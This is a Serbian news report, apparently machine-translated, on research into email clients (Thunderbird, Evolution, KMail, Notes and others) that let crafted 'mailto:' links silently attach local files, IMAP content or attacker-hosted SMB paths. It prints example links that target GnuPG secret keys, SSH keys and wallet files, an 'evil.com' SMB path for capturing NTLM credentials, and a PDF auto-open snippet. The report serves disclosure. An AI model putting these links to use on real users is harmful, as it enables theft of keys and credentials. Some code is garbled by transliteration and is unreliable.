Истраживачи са Универзитета Рур у Бохуму (Немачка) () понашање клијената поште приликом обраде „маилто:“ веза са напредним параметрима. Пет од двадесет испитаних клијената е-поште било је рањиво на напад који је манипулисао заменом ресурса помоћу параметра „приложи“. Додатних шест клијената е-поште било је подложно нападу замене ПГП-а и С/МИМЕ кључа, а три клијента су била рањива на напад за издвајање садржаја шифрованих порука.
Линкови «„користе се за аутоматизовање отварања клијента е-поште у циљу писања писма примаоцу који је наведен у линку. Поред адресе, можете навести додатне параметре као део везе, као што су предмет писма и шаблон за типичан садржај. Предложени напад манипулише параметром „аттацх“, који вам омогућава да приложите прилог генерисаној поруци.
Клијенти за пошту Тхундербирд, ГНОМЕ Еволутион (ЦВЕ-2020-11879), КДЕ КМаил (ЦВЕ-2020-11880), ИБМ/ХЦЛ Нотес (ЦВЕ-2020-4089) и Пегасус Маил били су рањиви на тривијални напад који вам омогућава да аутоматски прикључите било коју локалну датотеку, специфицирану преко везе као што је „маилто:?аттацх=патх_то_филе“. Датотека је приложена без приказа упозорења, тако да без посебне пажње корисник можда неће приметити да ће писмо бити послато са прилогом.
На пример, користећи линк као што је „mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg“ можете уметнути приватне кључеве из GnuPG-а у писмо. Такође можете послати садржај крипто новчаника (~/.bitcoin/wallet.dat), SSH кључеве (~/.ssh/id_rsa) и било које датотеке доступне кориснику. Штавише, Thunderbird вам омогућава да прикачите групе датотека по маски користећи конструкције као што је „attach=/tmp/*.txt“.
Поред локалних датотека, неки клијенти е-поште обрађују везе до мрежног складишта и путање на ИМАП серверу. Конкретно, ИБМ Нотес вам омогућава да пренесете датотеку из мрежног директоријума када обрађујете везе попут „аттацх=\\евил.цом\думмифиле“, као и да пресретнете НТЛМ параметре аутентификације слањем везе на СМБ сервер који контролише нападач (захтев ће бити послат са тренутним корисником параметара аутентификације).
Тхундербирд успешно обрађује захтеве попут „аттацх=имап:///фетцх>УИД>/ИНБОКС>1/“, који вам омогућавају да приложите садржај из фасцикли на ИМАП серверу. Истовремено, поруке преузете са ИМАП-а, шифроване преко ОпенПГП-а и С/МИМЕ-а, клијент поште аутоматски дешифрује пре слања. Програмери Тхундербирд-а су били о проблему у фебруару и у броју проблем је већ решен (Тхундербирд гране 52, 60 и 68 остају рањиве).
Старе верзије Тхундербирд-а су такође биле рањиве на две друге варијанте напада на ПГП и С/МИМЕ које су предложили истраживачи. Конкретно, Тхундербирд, као и ОутЛоок, ПостБок, еМ Цлиент, МаилМате и Р2Маил2, били су предмет напада замене кључа, узрокованог чињеницом да клијент поште аутоматски увози и инсталира нове сертификате пренете у С/МИМЕ порукама, што омогућава нападач да организује замену јавних кључева које је корисник већ ускладиштио.
Други напад, којем су подложни Тхундербирд, ПостБок и МаилМате, манипулише карактеристикама механизма за аутоматско чување нацрта порука и омогућава, користећи маилто параметре, да покрене дешифровање шифрованих порука или додавање дигиталног потписа за произвољне поруке, са накнадни пренос резултата на ИМАП сервер нападача. У овом нападу, шифровани текст се преноси преко параметра „боди“, а ознака „мета освежавање“ се користи за иницирање позива ИМАП серверу нападача. На пример: ' '
За аутоматску обраду „маилто:“ линкова без интеракције корисника, могу се користити посебно дизајнирани ПДФ документи - ОпенАцтион акција у ПДФ-у вам омогућава да аутоматски покренете руковалац маилто приликом отварања документа:
%ПДФ-1.5
1 0 обј
<< /Типе /Цаталог /ОпенАцтион [2 0 Р] >>
ендобј
2 0 обј
<< /Типе /Ацтион /С /УРИ/УРИ (маилто:?боди=——БЕГИН ПГП МЕССАГЕ——[…])>>
ендобј
Извор: опеннет.ру
